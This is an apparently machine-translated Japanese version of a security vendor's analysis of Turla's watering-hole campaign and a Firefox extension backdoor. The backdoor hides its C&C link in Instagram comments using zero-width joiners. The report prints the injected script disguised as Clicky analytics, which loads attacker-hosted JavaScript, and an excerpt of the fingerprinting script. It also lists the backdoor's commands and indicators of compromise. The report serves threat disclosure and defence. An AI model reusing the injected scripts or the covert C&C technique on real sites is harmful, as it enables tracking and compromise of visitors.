ESETでのTurlaキャンペーンをフォローしていますが、最近、ハッカーが数か月間使用されなくなった方法を使用して戻ってきたことを発見しました。
妥協の初期段階
感染インジケータのセクションの下に、Turlaが過去に水飲み場攻撃で使用したサイトのリストがあります。 このグループの特徴であるリストには、さまざまな国の大使館に関連する多くのサイトが含まれています。
ハッカーが元のページに追加するコードのおかげで、リダイレクトが実行されます。 過去数か月間に発見したスクリプトは次のとおりです。
<!-- Clicky Web Analytics (start) --> <script type="text/javascript">// <![CDATA[ var clicky_site_ids = clicky_site_ids || []; clicky_site_ids.push(100673048); (function() { var s = document.createElement('script'); var a = 'http://www.mentalhealthcheck.net/'; var b = 'update/counter.js'; s.type = 'text/javascript'; s.async = true; s.src = '//static.getclicky.com/js'; s.src = a.concat(b); ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s); })(); // ]]></script>
ハッカーがWeb分析アプリケーションであるClickyへのリンクを追加したことは注目に値します。 おそらく、この方法では、アプリケーション自体は攻撃で使用されていませんが、素人にとってスクリプトの正当性の外観を作成します。
追加されたスクリプトは、
mentalhealthcheck.net/update/counter.js
別のスクリプトを
mentalhealthcheck.net/update/counter.js
ます。 Turlaハッカーはこのサーバーを使用して、実行中のシステムに関する情報を収集する被害者にデジタル指紋スクリプトを送信します。 Googleアナリティクススクリプトへのリンクも同様の方法で使用されましたが、最近、Clickyの使用頻度が増えています。 感染インジケータのセクションには、最近数か月間に見つかったC&Cサーバーのリストがあります。 これらはもともと感染した合法的なサーバーです。
次のステップは、潜在的な被害者にJavaScriptフィンガープリントを提供することです。 これを行うために、C&CサーバーはIPアドレスで訪問者をフィルタリングします。 訪問者が宛先IPアドレスの範囲内にある場合、デジタル指紋のスクリプトを受け取ります。そうでない場合は、無害なスクリプトです。 以下は、ターゲットユーザーが受け取るスクリプトからの抜粋です。
function cb_custom() { loadScript("http://www.mentalhealthcheck.net/script/pde.js", cb_custom1); } function cb_custom1() { PluginDetect.getVersion('.'); myResults['Java']=PluginDetect.getVersion('Java'); myResults['Flash']=PluginDetect.getVersion('Flash'); myResults['Shockwave']=PluginDetect.getVersion('Shockwave'); myResults['AdobeReader']=PluginDetect.getVersion('AdobeReader') || PluginDetect.getVersion('PDFReader'); var ec = new evercookie(); ec.get('thread', getCookie)
このスクリプトは、
PluginDetect
と呼ばれるJSライブラリをダウンロードします。これは、ブラウザーにインストールされたプラグインに関する情報を収集できます。 次に、収集された情報がC&Cサーバーに送信されます。
さらに、スクリプトはevercookieのインストールを試みます。これにより、すべてのサイトのブラウザーでのユーザーアクティビティが追跡されます。
Turlaの水飲み場攻撃に精通している人にとって、ハッカーが実証済みの方法を使い続けていることは明らかです。
Firefox拡張機能
世界中の機関に送信された悪意のあるWord文書を使用した標的型フィッシング攻撃について説明したおしゃぶりAPTレポートをおそらく覚えている人もいます。 次に、システムにバックドアがロードされましたが、Turlaグループの最初のステージのバックドアであるSkipperについて話していることがわかりました。
このレポートは、同じタイプの悪意のあるドキュメントによってダウンロードされるFirefoxの拡張機能についても説明しています。 そして、この拡張機能の新しいバージョンを発見したようです。 これは、Pacifier APTレポートに記載されているものと実装が異なりますが、機能は似ていますが、JavaScriptのバックドアです。
悪意のあるHTML5エンコーディング拡張機能は、スイス企業の侵害されたサイトを介して拡散されました。 これは単純なバックドアですが、C&Cサーバーにアクセスする興味深い方法があります。
Instagramを使用する
HTML5エンコードでは、短いURL bit.lyを使用してC&Cサーバーにアクセスしますが、URLはコードに含まれていません。 拡張機能は、特定のInstagram投稿のコメントからアドレスを取得します。 この例では、これは公式アカウントのブリトニースピアーズの写真に対するコメントでした。
www.instagram.com/p/BO8gU41A45g
拡張機能は、写真の各コメントを調べて、個々のハッシュ値を計算します。 値が183と一致する場合、拡張機能はURL bit.lyアドレスを取得するために正規表現を実行します。
(?:\\u200d(?:#|@)(\\w)
写真へのコメントには、183のハッシュを持つ1つだけがありました-2月6日付で、写真は1月上旬に投稿されました。 コメントを受け取って正規表現に渡すと、bit.lyリンクが取得されます: bit.ly/2kdhuHX
正規表現の詳細な調査では、
@|#
またはUnicode文字
\200d
目に見えない文字Zero Width Joiner、通常は絵文字の分離に使用されるゼロ幅のジョイナーのいずれかを検索することがわかります。 コメントをコピーするかソースを調べた後、アドレスバーの各文字の前にゼロ幅ジョイナーが表示されます。
smith2155<200d>#2hot ma<200d>ke lovei<200d>d to <200d>her, <200d>uupss <200d>#Hot <200d>#X
短いリンクをクリックすると、
static.travelclothes.org/dolR_1ert.php
ます。 このアドレスは、Turlaの過去の水飲み場攻撃で使用されました。
bit.lyリンクの場合、変換統計を取得できます。
2月には、合計17の移行が記録されましたが、これはコメントの公開とほぼ同時に発生しました。 少数の遷移は、攻撃のテストの性質を示している可能性があります。
テクニカル分析
Firefoxの拡張機能は、単純なバックドアとして機能します。 システムに関する情報を収集し、AESを使用して暗号化されたこのデータをC&Cサーバーに転送します。 おしゃぶりAPTレポートで参照されている拡張機能の説明のように見えます。
バックドアコンポーネントは、4種類のコマンドを実行できます。
- 任意のファイルを実行する
- C&Cサーバーへのファイルのアップロード
- C&Cサーバーからファイルをダウンロードする
- ディレクトリの内容を読み取ります-サイズと日付を含むファイルのリストをC&Cサーバーに送信します
推定によると、攻撃はまだテストモードです。 拡張機能の次のバージョンが表示される場合、現在の拡張機能とは大幅に異なります。 Firefoxの将来のバージョンで消滅する拡張機能で使用されるAPIがいくつかあります。 Firefox 57以降、WebExtensionsが代わりになるため、アドオンとしてのみ使用できます。 このバージョン以降では、Firefoxはアドオンをダウンロードしなくなり、これらのAPIの使用は除外されます。
おわりに
ソーシャルネットワークを使用してC&Cサーバーのアドレスを取得するという事実は非常に注目に値します。 Turlaに加えて、 Dukesを含む他のグループもこのアプローチを採用しています。
ソーシャルネットワークの使用は、保護を構築するための追加の課題です。 第一に、サイバー犯罪者の活動に関連するソーシャルネットワークからのトラフィックは、正当なものと区別するのが困難です。 第二に、この方法はハッカーに大きな柔軟性を提供します-C&Cサーバーのアドレスを簡単に変更し、そのトレースを削除できます。
Turlaハッカーがデジタル指紋を使用する古い方法を再び適用し、C&Cサーバーの検出を複雑にする新しい方法を探しているのを見るのは興味深いです。
研究者に追加の質問をしたり、Turlaグループの活動に関連するマルウェアのサンプルを転送したりするには、threatintel @ eset.comにメールしてください。
Googleの脅威分析グループのClement Lecigneの研究支援の功績。
感染インジケータ(IoC)
Firefox拡張機能ハッシュ:
html5.xpi 5ba7532b4c89cc3f7ffe15b6c0e5df82a34c22ea
html5.xpi 8e6c9e4582d18dd75162bcbc63e933db344c5680
侵害されたサイトがデジタル指紋サーバーにリダイレクトする(執筆時点では、それらは正当であるか、機能していないサーバーにつながっていました):
hxxp://www.namibianembassyusa.org
hxxp://www.avsa.org
hxxp://www.zambiaembassy.org
hxxp://russianembassy.org
hxxp://au.int
hxxp://mfa.gov.kg
hxxp://mfa.uz
hxxp://www.adesyd.es
hxxp://www.bewusstkaufen.at
hxxp://www.cifga.es
hxxp://www.jse.org
hxxp://www.embassyofindonesia.org
hxxp://www.mischendorf.at
hxxp://www.vfreiheitliche.at
hxxp://www.xeneticafontao.com
hxxp://iraqiembassy.us
hxxp://sai.gov.ua
hxxp://www.mfa.gov.md
hxxp://mkk.gov.kg
水飲み場キャンペーンの第1段階のC&Cサーバーとして使用された侵害サイト:
hxxp://www.mentalhealthcheck.net/update/counter.js (hxxp://bitly.com/2hlv91v+)
hxxp://www.mentalhealthcheck.net/script/pde.js
hxxp://drivers.epsoncorp.com/plugin/analytics/counter.js
hxxp://rss.nbcpost.com/news/today/content.php
hxxp://static.travelclothes.org/main.js
hxxp://msgcollection.com/templates/nivoslider/loading.php
hxxp://versal.media/?atis=509
hxxp://www.ajepcoin.com/UserFiles/File/init.php (hxxp://bit.ly/2h8Lztj+)
hxxp://loveandlight.aws3.net/wp-includes/theme-compat/akismet.php
hxxp://alessandrosl.com/core/modules/mailer/mailer.php